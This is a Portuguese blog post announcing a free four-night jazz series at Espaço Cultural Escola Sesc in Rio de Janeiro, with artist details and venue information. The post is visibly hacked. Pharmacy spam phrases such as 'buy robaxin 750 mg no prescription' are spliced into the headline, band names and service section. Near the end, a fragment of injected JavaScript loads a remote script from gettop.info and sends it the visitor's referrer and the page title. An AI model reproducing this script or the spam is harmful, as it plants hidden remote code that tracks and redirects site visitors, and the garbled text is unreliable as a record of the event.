FestivalJazz/BluesNotíciaProgramaçãoRio de Janeiro

Todos os ritmos do jazz

skelaxin 800 price Projeto Abril, Jazz! leva atrações de diversas variantes do estilo ao Espaço Cultural Escola Sesc.

 

As noites de sábado vão ser animadas no Espaço Cultural Escola Sesc, no Rio de Janeiro, no mês de abril. Com entrada gratuita, o projeto Abril, Jazz! – uma novidade da programação – traz quatro shows musicais ao longo do mês, reunindo diferentes vertentes e formações dentro do estilo musical. As apresentações ocorrem sempre às 19h30, com distribuição de senhas a partir das 18h.

A série começa no dia 4 de abril com o baixista André Vasconcellos, um dos sidemen mais respeitados do país, que comemora 20 anos de uma carreira que contabiliza parcerias com Djavan, Milton Nascimento, Gilberto Gil, João Bosco, Lenine, Banda Black Rio, Hermeto Pascoal, Randy Brecker, Hamilton de Holanda e Leo Gandelman, entre outros. Para o concerto, a cenografia vai transformar o palco em um tradicional clube de jazz. Assim, o show terá formato intimista, com o público acomodado em mesas dispostas no palco e capacidade de 80 lugares.

A busca pela ancestralidade musical e cultural do continente africano (e sua influência na música brasileira) é o que marca o show da banda AfroJazz Buy Pills (foto), que ocorre no dia 11 de abril, no Anfiteatro (capacidade para 300 pessoas). O grupo promete uma performance contagiante, cheia de grooves e referências na música africana de Mulatu Astatke, Mongo Santa Maria, Guy Warren e Fela Kuti.

Buy Order María Toro Flamenco Jazz Project é a atração de 18 de abril. Misturando música flamenca e jazz, Toro incorpora a flauta no flamenco e cria uma linguagem única e pessoal, resultado de muitos anos de pesquisa e criação, que mergulha a plateia em um mundo desconhecido. O concerto ocorre no palco, com capacidade para 80 pessoas.

Fechando a programação, no dia 25 de abril, sobe ao palco o Quinteto Idriss Boudrioua. Saxofonista com formação clássica, o francês Idriss fascinou-se pelo Brasil após uma sessão do filme Orfeu Negro, de Marcel Camus, com trilha sonora de Tom Jobim e Luís Bonfá, até que, em 1981, veio morar aqui. Participou das edições 2011 e 2013 do Rock in Rio e lançou, nesse mesmo ano, o CD independente Base & Brass II online . A apresentação comporta 80 pessoas.

 

SERVIÇO:

Cheap Abril, Jazz! buy robaxin 750 mg no prescription

Shows com André Vasconcellos, AfroJazz, María Toro Flamenco Jazz Project e Quinteto Idriss Boudrioua

 

4, 11, 18 e 25 de abril, sábados, às 19h30

 

Espaço Cultural Escola Sesc – Escola Sesc de Ensino Médio (Av. Ayrton Senna, 5.677 Jacarepaguá – Rio de Janeiro. Tel.: 21 3214-7402)

 

Entrada gratuita, com distribuição de senhas a partir das 18h

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.